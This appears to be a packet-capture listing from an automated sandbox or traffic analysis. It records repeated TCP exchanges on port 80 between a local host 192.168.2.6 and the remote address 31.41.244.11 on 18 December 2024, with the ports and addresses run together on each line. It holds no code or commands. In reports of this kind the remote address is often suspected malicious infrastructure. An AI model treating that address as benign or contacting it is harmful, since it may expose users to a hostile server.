                                                                                                                                                              Dec 18, 2024 11:47:15.376358986 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.376404047 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.377454042 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.377504110 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.377535105 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.377576113 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.378565073 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.378609896 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.379895926 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.379941940 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.380007982 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.380057096 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.380465984 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.380516052 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.380680084 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.380728960 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.380847931 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.380894899 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.381884098 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.381939888 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.382028103 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.382072926 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.383105993 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.383150101 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.383323908 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.383367062 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.384445906 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.384491920 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.384525061 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.384577036 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.385390043 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.385441065 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.385524988 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.385567904 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.386540890 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.386589050 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.386662960 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.386709929 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.387742996 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.387789965 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.387837887 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.387876987 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.388947010 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.388995886 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.389030933 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.389079094 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.390057087 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.390104055 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.390171051 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.390213013 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.391221046 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.391268015 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.391335964 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.391376019 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.392431021 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.392482042 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.392484903 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.392539024 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.393625975 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.393686056 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.393702030 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.393733025 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.394748926 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.394788980 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.394804001 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.394838095 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.395910025 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.395973921 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.396064997 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.396112919 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.397110939 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.397160053 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.397175074 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.397223949 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.398281097 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.398292065 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.398361921 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.399452925 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.399508953 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.399585009 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.399641991 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.400592089 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.400630951 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.400747061 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.400780916 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.401820898 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.401834011 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.401875973 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.402947903 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.402996063 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.403017044 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.403059959 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.404114008 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.404165983 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.404201031 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.404244900 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.405313969 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.405359030 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.405424118 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.405462980 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.406445026 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.406502962 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.406511068 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.406543970 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.407624960 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.407671928 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.407736063 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.407774925 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.408797979 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.408850908 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.408889055 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.408932924 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.410053015 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.410115004 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.410140991 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.410187960 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.411125898 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.411180019 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.411214113 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.411262989 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.412297010 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.412355900 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.412389994 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.412436008 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.413512945 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.413569927 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.413727045 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.413779974 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.414642096 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.414690018 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.414727926 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.414771080 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.415837049 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.415879011 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.415941954 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.415988922 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.417025089 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.417073965 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.417382956 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.417428017 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.418252945 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.418308973 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.418324947 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.418370008 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.419389963 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.419446945 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.419473886 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.419519901 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.420500040 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.420556068 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.420723915 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.420767069 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.421681881 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.421725035 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.422091007 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.422137022 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.422888041 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.422899008 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.422933102 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.422944069 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.424112082 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.424163103 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.424204111 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.424249887 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.425328016 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.425385952 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.425419092 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.425461054 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.426410913 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.426459074 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.426476955 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.426512957 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.427738905 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.427789927 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.427803040 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.427844048 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.429132938 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.429181099 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.429508924 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.429555893 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.430340052 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.430397034 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.430413961 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.430461884 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.431473017 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.431523085 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.431550026 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.431592941 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.432615995 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.432661057 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.432723999 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.432776928 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.433624983 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.433684111 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.433695078 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.433743954 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.434743881 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.434793949 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.434873104 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.434925079 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.435740948 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.435816050 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.435832024 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.435900927 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.436995983 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.437005997 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.437046051 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.566719055 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.566775084 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.566821098 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.566859961 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.567311049 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.567358017 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.567420006 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.567452908 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.568516016 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.568562031 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.568623066 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.568662882 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.569622040 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.569668055 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.571053028 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.571110010 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.571192026 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.571234941 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.571688890 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.571736097 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.571857929 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.571902037 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.572880030 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.572899103 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.572935104 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.572962046 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.574009895 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.574060917 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.574110031 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.574162006 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.575202942 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.575251102 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.575285912 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.575334072 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.576370955 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.576406002 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.576442003 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.576493979 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.577526093 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.577567101 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.577586889 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.577626944 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.578696012 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.578742981 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.578799009 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.578840971 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.579930067 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.579988003 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.579993963 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.580027103 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.581370115 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.581391096 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.581414938 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.581439018 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.582231045 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.582243919 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.582278013 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.582289934 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.583384037 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.583440065 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.583498001 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.583539009 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.584553957 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.584595919 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.584635019 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.584682941 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.585732937 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.585783958 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.585803032 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.585844994 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.586893082 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.586931944 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.586971045 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.587027073 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.588051081 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.588095903 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.588156939 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.588193893 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.589219093 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.589263916 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.589327097 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.589376926 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.590396881 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.590436935 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.590516090 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.590563059 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.591598034 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.591639996 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.591739893 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.591792107 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.592732906 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.592782974 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.592839003 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.592885971 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.593949080 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.593991041 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.594026089 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:15.594068050 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:15.595088005 CET804980631.41.244.11192.168.2.6
